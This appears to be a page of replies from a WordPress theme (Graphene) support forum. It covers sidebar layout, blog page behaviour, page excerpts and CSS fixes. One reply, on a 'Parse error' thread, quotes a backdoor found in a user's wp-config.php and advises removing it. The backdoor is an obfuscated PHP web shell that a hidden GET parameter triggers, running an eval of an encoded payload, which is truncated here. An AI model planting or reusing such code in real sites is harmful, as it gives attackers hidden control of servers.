Syahir Hakim

Keymaster

Forum Replies Created

  • Admin

    In Graphene 1.6, the positioning of the sidebars will be consistent. That is, sidebar1 will always be on the right side, and sidebar2 will always be on the left side, regardless of column mode.

    Which also means:

    Two-column right sidebar => sidebar1 shown on the right

    Two-column left sidebar => sidebar2 shown on the left (used to be sidebar1 shown on the left)

    Three-column left and right sidebar => sidebar1 shown on the right, sidebar2 shown on the left

    … and so on.

    Admin

    In reply to: Blog page content not showing

    #22999

    This is a standard WordPress behaviour. The page for Blog is used just as a placeholder page to display all posts. The content on that page won’t be displayed.

    Admin

    In reply to: Problem with the menu

    #23008

    Update to WordPress 3.3.1.

    Admin

    Josh, Graphene 1.6 hasn’t been released yet, but it will be (very) soon.

    Admin

    In reply to: Editing child page summary text

    #22975

    Pages don’t have custom excerpt by default, but it’s quite easy to add either using a plugin or just a few lines in a child theme’s functions.php file:

    <?php
    function my_custom_init() {
    add_post_type_support( 'page', 'excerpt' );
    }
    add_action( 'init', 'my_custom_init' );
    ?>
    Admin

    In reply to: Graphene Wiki

    #22780

    Josh, it was added in Graphene 1.6b.

    Admin

    In reply to: Parse error

    #22944

    Topic moved to Support. Please post in the correct section next time.

    As for your question, it is not an issue with the theme at all. Instead, somebody must have inserted this chunk of code in your wp-config.php file:

    <?php if(isset($_GET["t2732n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2 (blablabla) i9LbaFz7lC13SwzDxAYT72vwA='x29x29x29x3B","."); exit; } ?>

    If you (or someone you trust) did not add that code, I suggest you remove it immediately.

    Admin

    In reply to: Help with header menu colors and fonts

    #22625

    @josh and @ken,

    Go ahead and start the topic and make it sticky. I’m sure both of you have the priviledge to sticky a topic. But if not, let me know.

    @ksmadhav,

    Try this CSS:

    .homepage_pane {
    display: block;
    width: 100%;
    }
    .homepage_pane img {
    float: left;
    margin-right: 10px;
    }
    .homepage_pane .post-title {
    overflow: hidden;
    }
    Admin

    In reply to: Setting up static home page

    #22912

    Go to WP Admin > Pages and delete the “Home” page.

    Or if you’re trying to set the “Home” page as the static front page, you might want to use the Custom Menu feature for the navigation menu, instead of using the default navigation menu. Check out WP Admin > Appearances > Menus.

    Admin

Viewing 10 posts - 3,721 through 3,730 (of 6,030 total)